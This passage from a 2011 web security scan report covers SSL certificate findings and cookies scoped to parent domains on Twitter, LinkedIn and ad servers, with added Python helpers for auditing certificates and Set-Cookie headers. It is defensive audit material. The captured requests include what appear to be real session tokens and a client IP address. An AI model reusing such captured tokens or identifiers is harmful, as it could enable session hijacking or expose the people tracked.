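    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def check_certificate(names, not_before, not_after, host, now):
    """Return a list of problems; empty means the certificate's names cover
    `host` and its validity window contains `now`."""
    problems = []
    if not any(hostname_matches(n, host) for n in names):
        problems.append("hostname %s not covered by %s" % (host, ", ".join(names)))
    if now < not_before:
        problems.append("not yet valid (from %s)" % not_before.isoformat())
    if now > not_after:
        problems.append("expired (to %s)" % not_after.isoformat())
    return problems


# Finding 10.1 in UTC: Fri Nov 19 18:00:00 GMT-06:00 2010 is 2010-11-20T00:00Z,
# Tue Jan 22 17:59:59 GMT-06:00 2013 is 2013-01-22T23:59:59Z.
EHOSTS_NAMES = ["*.ehosts.net"]
EHOSTS_NOT_BEFORE = datetime(2010, 11, 20, 0, 0, 0, tzinfo=timezone.utc)
EHOSTS_NOT_AFTER = datetime(2013, 1, 22, 23, 59, 59, tzinfo=timezone.utc)
SCAN_TIME = datetime(2011, 9, 4, 1, 0, 0, tzinfo=timezone.utc)

if __name__ == "__main__":
    print(check_certificate(EHOSTS_NAMES, EHOSTS_NOT_BEFORE, EHOSTS_NOT_AFTER,
                            "sprintlb.ehosts.net", SCAN_TIME))
```

For a live connection, Python's ssl.create_default_context() performs all three checks, including chain validation against the system trust store; the functions here are for reasoning about a certificate that was captured, as in this report, after the fact.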



10.1. https://sprintlb.ehosts.net/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://sprintlb.ehosts.net
Path:   /

Issue detail

A problem was identified with the server's SSL certificate; the scanner's description of it is not preserved in this copy of the report. The server presented the following certificates:

Server certificate

Issued to:  *.ehosts.net
Issued by:  DigiCert High Assurance CA-3
Valid from:  Fri Nov 19 18:00:00 GMT-06:00 2010
Valid to:  Tue Jan 22 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

10.2. https://socialize.gigya.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.gigya.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Nov 04 09:50:30 GMT-06:00 2010
Valid to:  Sun Nov 04 09:50:30 GMT-06:00 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Thu Jun 29 11:06:20 GMT-06:00 2034

10.3. https://www.linkedin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.linkedin.com
Issued by:  Thawte SGC CA - G2
Valid from:  Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Thawte SGC CA - G2
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Wed Jul 28 18:00:00 GMT-06:00 2010
Valid to:  Tue Jul 28 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

10.4. https://www.sprint.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.sprint.net
Issued by:  Entrust Certification Authority - L1B
Valid from:  Mon May 18 12:20:39 GMT-06:00 2009
Valid to:  Tue Jun 05 12:50:38 GMT-06:00 2012

Certificate chain #1

Issued to:  Entrust Certification Authority - L1B
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Mon Aug 25 12:14:26 GMT-06:00 2008
Valid to:  Sat Aug 25 12:44:26 GMT-06:00 2018

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:  Tue Jul 24 08:15:12 GMT-06:00 2029

11. Cookie scoped to parent domain  previous  next
There are 72 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
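
Added example (not scanner output and not LinkedIn's or Twitter's code): a Set-Cookie audit covering both cookie findings in this report, the missing Secure flag on a cookie issued over HTTPS (section 8) and a Domain attribute that scopes the cookie to a parent of the issuing host (section 11), together with a harden() function that re-emits a header the way the two remediations ask. The sample headers are constructed from the two responses above with the long token values shortened; the session-token heuristic stands in for the report's "appears to contain a session token" judgement.

```python
"""Audit Set-Cookie headers for a missing Secure flag over HTTPS and for a
Domain attribute that widens scope to a parent domain.  Added example; the
sample headers are constructed from the responses above with token values
shortened."""
import re

LINKEDIN_HEADERS = [      # issued by https://www.linkedin.com/secure/login
    'sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/',
    'leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpe"; Version=1; Max-Age=1799; Path=/',
    'lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/',
    'NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly',
]
TWITTER_HEADERS = [       # issued by http://api.twitter.com/1/.../statuses.json
    '_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEy--80ecc5b3; domain=.twitter.com; path=/; HttpOnly',
]

TOKEN_NAME = re.compile(r"sess|auth|token|sid|login", re.I)


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, {attribute: value});
    attribute names are lower-cased and bare flags map to ''."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), value.strip(), attrs


def looks_like_session_token(name, value):
    """A telltale name, or a long value drawn from a wide character set."""
    v = value.strip('"')
    return bool(TOKEN_NAME.search(name)) or (len(v) >= 16 and len(set(v)) >= 8)


def audit_cookies(headers, host, scheme):
    """Return [(cookie, problem, looks_like_token)] for every weakness found
    in cookies issued by `host` over `scheme`."""
    findings = []
    for h in headers:
        name, value, attrs = parse_set_cookie(h)
        if attrs.get("max-age") == "0":          # deletion cookie; nothing to protect
            continue
        token = looks_like_session_token(name, value)
        if scheme == "https" and "secure" not in attrs:
            findings.append((name, "no Secure flag", token))
        if "httponly" not in attrs:
            findings.append((name, "no HttpOnly flag", token))
        dom = attrs.get("domain", "").lstrip(".").lower()
        if dom and dom != host.lower() and host.lower().endswith("." + dom):
            findings.append((name, "scoped to parent domain " + dom, token))
    return findings


def harden(header):
    """Re-emit a Set-Cookie value with Secure and HttpOnly set and the Domain
    attribute dropped, so the cookie is host-only."""
    name, value, attrs = parse_set_cookie(header)
    parts = ["%s=%s" % (name, value)]
    for k, v in attrs.items():
        if k in ("domain", "secure", "httponly"):
            continue
        parts.append("%s=%s" % (k, v) if v else k)
    return "; ".join(parts + ["Secure", "HttpOnly"])


if __name__ == "__main__":
    for f in audit_cookies(LINKEDIN_HEADERS, "www.linkedin.com", "https"):
        print("linkedin", f)
    for f in audit_cookies(TWITTER_HEADERS, "api.twitter.com", "http"):
        print("twitter", f)
    print(harden(LINKEDIN_HEADERS[2]))
```

The Secure check is only raised for cookies issued over HTTPS, which is why the Twitter cookie, fetched over plain HTTP, is reported for its parent-domain scope and nothing else; dropping Domain is the right fix only when no sibling host legitimately needs the cookie.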


11.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: _twitter_sess, set with domain=.twitter.com by api.twitter.com (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=110147983668019200&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1315097070986=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315097213-36482-17537
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 00:46:53 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.03541
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 9d4c870c9296f3cdf37ddb0b78039db1ef7aa6d3
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

11.2. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=TheStateWorker&callback=jQuery15205311797398608178_1315097321811&_=1315097336786 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTcy%250ANjg1MmRkYWE1MzRlMmE4OGU2OTFjYTBiYWVlOWQ1--e78b59f956406f6acf8bd93189b1699ee1b15969

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 01:02:55 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00676
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 01:07:55 GMT
Vary: Accept-Encoding
Content-Length: 267
Connection: close

jQuery15205311797398608178_1315097321811({"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/statuses\/user_timeline.json?screen_name=TheStateWorker&c
...[SNIP]...

11.3. http://www.personalcreations.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=uvn4ybjeh3ciqrzoi2ilygjh; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=uvn4ybjeh3ciqrzoi2ilygjh; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-1,xta-1,trf-2,tpp-3,tbc-1,ntd-1,tvc-2,tmm-1,xtb-1,tnp-1,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:11 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-2,thp-1,txb-1,tks-2,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:11 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=42; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:11 GMT; path=/
Set-Cookie: PCR_BrowserId=d9954876-3a8e-4f70-8099-40c2ea2161b9; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:14 GMT
Content-Length: 166986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...

11.4. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2925993182975414771 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4e62cac9*7ILJjOd50C*xAn6CqfjViVWUXPcP2NGnpPxnQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

11.5. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26912047&ahcid=2168902&bimpd=_P8jnlWa9XstK_JlmmehibBCY86uUcZ8orSis2gk3CgGuM8NRppyPQMYvcwYVWxeqx53lV-injqapvMTqVcy93ETQudoxG65t8gPvD3_8uXTH1PXOPFQZu8QV_sfud_H-APXWDieQ47BkVHFFBn37s3aR3R9fKaUZJwqF3RKDtidgFaK5usOyzENC88rTUlt9K10asyG35OWlNfIYOZ-eD5tcSKw-zblptFUhK9YrBvJ-WVZmeLXwW90Vc9Kb9XoiPnsI1H5EzsiLAXyc7PFNmMqw1dLCgnGdMDgUmN3gwdG_Ur_2SMU4K10y_Sli8mM2o2RfArbjquS3LhtH_oucb3wc-cQ7FRKnITKYzO3zYXWG83x93SQchtOADUffiJhCEHm6r5PNXkH9qRXbUWExW_-Tu619iR6e1KbNlVj8jLndn3HHWXSm6j08SLj-h_ckdMj51v2x5gNhdpsMl_xftjg47NtKOd3aMYaFKX0mDx-mbKM0JHYn1hPNWK3mE7pzqC_aS7mkgsjA3S3GAANk8l2hYjwLveMS5-0Prm8ku-d-0Mgw9kibbpEMGHOE3HL6dCtmc69w_hrmFS4bSqF1Ubrzov4KJkplEjIfx4sijhgID_WtH2HGV-ZlBaxQA1ij1j_O9y58VxgD6JjAd6GfmoJ8UbwkKQyww1upyp3jn-KeGFWA05C4wMLlJET2Sr393OncBALoxLqvhLiy_Csz4BhnEKFF2M8my_fgvGuVC-BGn7V08Zk_msX51p9Pm_1V71_KFY8MHiZdUStS_Pc88kzr_aJ80D7tEUMLPW-_InB3ZbanTW1OTZfNoJuT_Q8bPiK77OYvzyO19oo0lS1JrBteXm6E3IqGkdPbGLUoEv66yPDCbC2aqvzIe2Oz4Dl&acp=1.72 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:06 GMT
Set-Cookie: uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:05 GMT
Content-Length: 9577


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

11.6. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

11.7. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=f09828 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
